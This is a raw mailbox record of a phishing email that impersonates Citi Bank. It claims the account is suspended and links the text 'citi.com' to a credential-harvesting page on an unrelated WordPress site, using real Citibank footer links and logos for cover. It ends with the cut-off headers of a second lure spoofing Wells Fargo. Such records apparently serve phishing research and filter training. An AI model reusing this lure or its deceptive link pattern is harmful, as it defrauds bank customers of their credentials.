From: "Citi Bank"<customers.mails@payment.com>
To: jose@monkey.org
Subject: Your Citi Bank Account Has Been Temporarily Suspended
Date: 01 Nov 2016 03:08:31 -0400
Message-ID: <20161101030821.3AAC38FDBECD2026@payment.com>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_728EADEF.2E5B18F5"
Status: O
X-Status: 
X-Keywords:                  
X-UID: 415


------=_NextPart_000_0012_728EADEF.2E5B18F5
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<div id=3D"_aolWebSuiteMsgBody" class=3D"msgBody" >
<div id=3D"AOLMsgPart_1_28fc7326-3b17-405e-bcfe-69e89bc2e24a">
<div class=3D"aolReplacedBody" ><div style=3D"color:#000; background-

color:#fff; font-family:HelveticaNeue, Helvetica Neue, Helvetica, Arial,=20=


Lucida Grande, sans-serif;font-size:12pt"><div class=3D"aolmail_thread-

body"><div class=3D"aolmail_body aolmail_undoreset"><div=20

id=3D"aolmail_yiv0034976520"><div><div><div align=3D""><table style=3D"bord=
er-

collapse:collapse;" cellpadding=3D"0" cellspacing=3D"0" border=3D"1" width=
=3D"500"><tbody><tr><td align=3D"" valign=3D"top" width=3D"100%"><table cel=
lpadding=3D"0" cellspacing=3D"0" border=3D"0" width=3D"100%"><tbody><tr><td=
 width=3D"100%"><div align=3D""><table cellpadding=3D"0" cellspacing=3D"0" =
border=3D"0" width=3D"100%"><tbody><tr><td align=3D"left" valign=3D"top" wi=
dth=3D"100%"><div align=3D"left"><table cellpadding=3D"0" cellspacing=3D"0"=
 border=3D"0" width=3D"100%"><tbody><tr><td style=3D"padding-top:8px;" alig=
n=3D"left" valign=3D"top" width=3D"50%"><img src=3D"cid:hlogo.gif" alt=3D"C=
itibank - UAE" border=3D"0" height=3D"45" width=3D"157"></td>
        <td style=3D"padding-top:8px;" align=3D"right" valign=3D"top" width=
=3D"50%"><br>
            <a rel=3D"nofollow" target=3D_blank=20

href=3D"http://www.citibank.com/uae/gcb/info/privacy.htm"><img src=3D"cid:t=
npvcy.gif" border=3D"0" height=3D"10" width=3D"55"></a> <a rel=3D"nofollow"=
 target=3D_blank=20

href=3D"http://www.citibank.com/"><img src=3D"cid:tncom.gif" border=3D"0" h=
eight=3D"10" width=3D"83"></a> <br></td>
      </tr>
    </tbody>
  </table>
</div>                </td></tr>
			  <tr>
                <td align=3D"left" valign=3D"bottom">
				<table style=3D"border-top:1px #d0d0d0=20

solid;" cellpadding=3D"0" cellspacing=3D"0" border=3D"0" width=3D"100%">
                  <tbody><tr valign=3D"top">
                    <td style=3D"padding: 8px; font-family: Arial; font-

size: 12px; text-align: justify;" align=3D"left" valign=3D"top"><div>Dear=
=20

Customer ,<br>
                        <br>
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20
                      <div>This=20
is to inform you that your Citi Bank online account has been temporarily=20=


restricted for profile verification because you have not logon your=20

account for sometime now. Logon below to verify your account. </div>
<p>
<p>
<a href=3D"http://grupocobus.com/wp-content/plugins/backup/com.htm"><h1>cit=
i.com</h1></a>
<p>
                      <div>Thank You.</div>
                      <div>                        Best Regards,<br>
                        <br>
                        Citi Bank U.S.A<br>
                        388 Greenwich Street New York, NY 10013=20

U.S.A.</div>
                      </td>
                  </tr>
				  <tr>
                     <td bgcolor=3D"#CCCCCC" valign=3D"top"><img height=3D"=
1px" width=3D"100%"></td>
                  </tr>
                  <tr valign=3D"top">
                    <td align=3D"center" valign=3D"top"><table cellpadding=
=3D"6" cellspacing=3D"0" border=3D"0" width=3D"100%">
                      <tbody><tr align=3D"center" valign=3D"top">
                        <td align=3D"left"><table cellpadding=3D"2" cellspa=
cing=3D"0" border=3D"0" width=3D"100%">
                          <tbody><tr>
                            <td><div style=3D"font-family:Arial, Helvetica,=
=20

sans-serif;font-size:10px;color:#666666;">=20
                              <div>Citibank Terms and Conditions apply=20

and are subject to change without prior notice. They are available upon=20

request and on <a rel=3D"nofollow" target=3D_blank=20

href=3D"http://www.citibank.com/uae/gcb/info/docs/tnc_e.pdf">our=20

website</a>.</div>
                            </div></td>
                            </tr>
                        </tbody></table></td>
                      </tr>
                    </tbody></table></td>
                  </tr>
                  <tr valign=3D"top">
                    <td><table cellpadding=3D"0" cellspacing=3D"0" border=
=3D"0" width=3D"100%">
					<tbody><tr>
						<td bgcolor=3D"#CCCCCC" valign=3D"top"><img height=3D"1px" width=3D"1=
00%"></td>
					</tr>
				</tbody></table></td>
                    </tr>
                </tbody></table>                   </td>
			  </tr>
            </tbody></table>
            </div></td></tr>
=20=20=20=20=20=20=20=20
        <tr>
                <td align=3D"center" valign=3D"top" width=3D"100%">
                  <div align=3D"left">
                  <table cellpadding=3D"0" cellspacing=3D"0" border=3D"0" w=
idth=3D"100%">
                    <tbody>
                    <tr>
                      <td align=3D"left" valign=3D"top" width=3D"10"> </td>=

                      <td align=3D"left" valign=3D"top" width=3D"15"><br>
                        <img src=3D"cid:flogo1.gif" border=3D"0" height=3D"=
15" width=3D"61"><br><a rel=3D"nofollow" target=3D_blank=20

href=3D"http://www.citibank.com/"><font face=3D"Arial"=20

size=3D"1">Citibank.com</font></a> </td>
                      <td valign=3D"top">
                        <div align=3D"right"><br>
                        <a rel=3D"nofollow" target=3D_blank=20

href=3D"http://www.citibank.com/uae/gcb/info/privacy.htm"><font=20

face=3D"Arial" size=3D"1">Privacy</font></a><font face=3D"Arial" size=3D"1"=
><br>
                          <a rel=3D"nofollow" target=3D_blank=20

href=3D"http://www.citibank.com/citibank/disclaim.htm">Terms, conditions,=
=20

caveats and small=20
                        print</a><br>
                        Copyright &copy; 2016,=20
                    Citicorp<br>
                          <br>
                          </font></div></td>
                      <td valign=3D"top" width=3D"10">
                      </td></tr>
                    </tbody></table></div></td>
        </tr>
    </tbody></table></td></tr></tbody></table></div></div>
<map name=3D"aolmail_Map">
=20=20
------=_NextPart_000_0012_728EADEF.2E5B18F5
Content-Type: image/gif; name="hlogo.gif"
Content-Transfer-Encoding: base64
Content-ID: <hlogo.gif>

R0lGODlhnQAtAMT/AMDAwOcAGO9SY+8pQv+9xveMnPf3/+/v9+fn787W59be71pzpcbO3jFS
jAApawgxc6W1zkJjlBA5cxhCe3uUtYScvQAxa2OEpZStxrXG1u/39//e3v/39/f39wAAAAAA
ACH5BAEAAAAALAAAAACdAC0AQAX/ICCOZGmeaKqubOu+cCzLxBDcuCDg+EB0s6BwSJxhLA6k
MlkBJJINESVJVTJEDYslM4pIKJJFJnNJQkadxuQyhkQsE8SoEf5mIJeHRTHKOChodHxFhDAL
SBcqCUhRIwcSFhIHJVkOXCIRD5MlDBaAEA5nJU8RImkWmySHl34WVwAVFhiFtLW2t7i5uru8
vb6/wMHCLhw6AgUlGnqSJgXGQG8awH6Aw7cRSdUoixaNIo+RqVhIlwCZ4iIMDgskHQpjDO4O
peNyJasi1ABlida0GZWWwLnSyYG3fFVkjbM050+3CxSwRZAmItYEChUoNGhwxNsEVCawsfpT
oswsfyhT/6pcybKly5cwY8Ig4MxGgAHHfsjcaatADgIGHGHoEBQAgR03kIlY4ADdLgYPtPGU
0YHBGHumDmgAAkArAj0PEGjlquGAuGgADCTIEA/FgTEZsDqiWDVDAhP6SJidigIBJAcTyiG4
IOEKt0ZAwDHjCqBSuUyDVG1R0alfYwtN9E6YwDWvH3Z8UUhw8ODVNkZ6ITEj4biLJhMILNCD
AKdCG8Lz5ry+t4UDAD8XJiyIlTm0iQMfHUioIBYBQIWLDKa2ULprBmmtMU0mYeDNJFAnSdCm
d9kpvt8OigOgYEGU8ffw48ufT7++/fv48+vfz7+//xMcFGATDzz44NR/MvmUQ/8BG9C1gTM8
KCWCBhgcqItVCJ6gYAAFFAVAB8+J0wFSHGpnIS4ZeJLhCxqMJgFjJ0Czmy957cdAcEiQFsEl
CUggAT0V+KiEjxLc1YEXEjz2QAcQBNSAex9W8IYDSTywgGlpTHBAkEo0UA56UjEQBozv+UFF
Awt4gcQEAEDVjQgYbITEAxs1wMcpDGk3gWkAYCDdCApQNMIhJ52yJwkVOGBZjVNACZ+fkdzF
iQiHMdZiJDAakJ05FpAJAG3qmdAJPZq6EhJIYAKgwQQNCCrfX1+KqkcDlrroaql5cuqqCArI
1kclSazha1pZeHqeH7Ypp2V9sCqixUEtKnfrpmiNsg6mAL3Sysmwl+0KwLGkcfbIavJBGkoJ
B4ji5kGPKFdCqdtx6qmfZ8TiaJvcNvCAt6v49pkjm504lZg5Enlmm7OWMOWPE5SC52ORfOln
PwoAJg4EH5GaBb/b1QhAbAfJdwAGEUzgYwQU2IPAAgtQQKYbEjRwgRwGUMCyaRWwk4EXgFGw
awWVrIHAypl1YPO8V1K6gKNEr+j001BHLfXUVFdt9dVYZx1DCAA7

------=_NextPart_000_0012_728EADEF.2E5B18F5
Content-Type: image/gif; name="tnpvcy.gif"
Content-Transfer-Encoding: base64
Content-ID: <tnpvcy.gif>

R0lGODlhNwAKALMAAP///+/v9d7e7M/P4ru71qqqzJqawoqKuXZ2rWZmo1VVmUVFjzExgyEi
exERcAAAZiH5BAUUAAAALAAAAAA3AAoAAASmEMg5l12GyqO0/2D4PQdRNIcmEGLrhg8LcMCi
PIaBAEkhLQLAzZEBIByowGIAUAZAj6gn1lykHrvAYTHrEBqS4AlgaAQImcTOwIABHtPoI/Gk
zriBRwCR3S7gCSkTYwpFI1IadhN2WxKFDUwHDAQHgIITDQR6L4kyizKNZA1gPDuVomeCCA0J
nJ2vdxIBDoIDDQ4KXEZIRQIPPq7BwhMEDsPHwWotEQA7

------=_NextPart_000_0012_728EADEF.2E5B18F5
Content-Type: image/gif; name="tncom.gif"
Content-Transfer-Encoding: base64
Content-ID: <tncom.gif>

R0lGODlhUwAKALMAAP///+/v9d7e7M7P4ru71qqqzJqawoqKuXR3rmVnpFVVmUVFjzExgyEh
ehEScQAAZiH5BAUUAAAALAAAAABTAAoAAAT/EMhJwUgLBbAOEIxEOACRVCh6eGnrvu/gHISi
lEL5SEEBHAsYqiMsGlGKE2ADQBgAjyhhEDw0GDPJwfFASBaKxyLXCSgGFEPDoWk6Gj7qoosQ
51LRHcpBqBAJeoA/DQIDD2g5AQ85Dx4ZHAcJShIChwIeagGAAoADAQ43Cl54UHh9FH+BO0Bf
mGAPfbA/QQsMshMGQRMJLAsGgpCzLXkpRKgewIKskCMFBbKyrAsOGGm6Erxfv3pEy0cABXw/
J6lLyoQCDgMGIYaxfdIHigJmA5X28pmbwN3X31YPGKAhEgDLAEEGFGDxEGCOggVootHyICmd
DzVsJCB444OfB2/fC0KKHEmypMmTRyIAADs=

------=_NextPart_000_0012_728EADEF.2E5B18F5
Content-Type: image/gif; name="flogo1.gif"
Content-Transfer-Encoding: base64
Content-ID: <flogo1.gif>

R0lGODlhPQAPAPcAAAApaxhCeylShDlajEprnFpzpWN7pWuErXOMrXOMtYSUtYycvZytxqW1
zrXG1sbO3tbe597n7+fn7+8IGO8pQu9aY+/v9/elrff39/f3///Gzv/39///////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
/////////////////////////////////ywAAAAAPQAPAAAI/gA5CBxIUOCFChQmTKBQ4QKG
ghAjSpxIsaCGhAorVFC48MLAhxVDfhQ58EJGDRYyRMCgYeMEjxwWOCBZ0cECmiZfZuBgoUAB
gRk0KPQogAFNigh+ktSAcuADAAQIYnigAcMAo0clJp0YoQECBA0scIDAAEIGBwcAFJ1J1iyH
AQ0iKDjQAKQFBwoMIHggEEMDCA8QHHCwQeBWDn4hDGwQAIBjAAMiLABwc8BjqBwYAPhplUAB
BQgCHBD4YMCBBQYCGLUgYMDnAwFucji8QEAE0o0JNGhAIIBkyhzQqmUws8FmgQMISBDImC8G
sYYHIG69PHOA5VsfCJgp0AAAAwMt/iieLPspeObHN8D9OEC2QLGMLWAQ4D5CAL5JMRBQQLAx
34LkCeQAZugpVRRBBYBngQIEEGBAAQKIdaBAEAQwk2AKAICVQAD4BlGGsg0YVYEcqLchBwaA
V4BuDjQwQITzNTBQBALIGNpnAlT3FgAyAghccARyYJyBJxKwgHaKMReAWAH0OJaFswHwgFXu
TQalBV5hECCQUclnHHhUDiTBdg4MAJ118tU4o5oIjMhAjn0R4JgAjQUAwWT8PQmZmUMip1oE
ERggnX0KSBBBmUtioNpAFdqoFGvuWbCAZQGs14CaSgaAQHDtIXYAAwe8WMBtnA4wAAIMGCBW
AdxxIIEBCnwxkGdmBzwUEAAAOw==

------=_NextPart_000_0012_728EADEF.2E5B18F5--

From jose@monkey.org Tue Nov  1 07:51:44 2016 +0000
Return-Path: info@wellsfargo.com
Delivered-To: jose@monkey.org
X-FDA: 72133403328.15.beef77_6684101011e07
X-Spam-Summary: 88,1.2,0,cc3542706b64971d,d41d8cd98f00b204,info@wellsfargo.com,:info@wellsfargo.com,RULES_HIT:41:72:355:379:581:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1263:1313:1314:1325:1345:1381:1431:1432:1436:1437:1516:1517:1518:1534:1541:1559:1565:1575:1588:1589:1592:1594:1711:1714:1719:1730:1748:1777:1792:2198:2199:2525:2561:2564:2682:2685:2859:2890:2894:2895:2931:2933:2937:2939:2942:2945:2947:2951:2954:3022:3040:3138:3139:3140:3141:3142:3148:3690:3867:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:4042:4321:5007:6261:6642:6678:6687:6703:8518:8599:8603:8829:8957:8987:9025:9059:9388:9873:10008:10030:10049:10346:10400:11529:11658:11914:12043:12058:12217:12438:12555:12561:12889:12986:13139:13236:13237:13439:13848:14037:14096:14181:14596:14721:14828:14849:21080:21251:21433:21450:21451:21524:30001:30026:30041:30054:30055:30064:30070:30075,0,RBL:85.152.56.3-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not b
X-HE-Tag: beef77_6684101011e07
X-Filterd-Recvd-Size: 3572
Received: from Inves2003.aytosalas.local (unknown [85.152.56.3])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  1 Nov 2016 07:51:44 +0000 (UTC)
Received: from crd-ts.crown.local ([12.38.141.18]) by Inves2003.aytosalas.local with Microsoft SMTPSVC(6.0.3790.4675);
	 Tue, 1 Nov 2016 08:47:37 +0100
Content-Type: multipart/alternative; boundary="===============0960936491=="
MIME-Version: 1.0
Subject: Account Security Update  (Wells Fargo Online)
To: Recipients <info@wellsfargo.com>
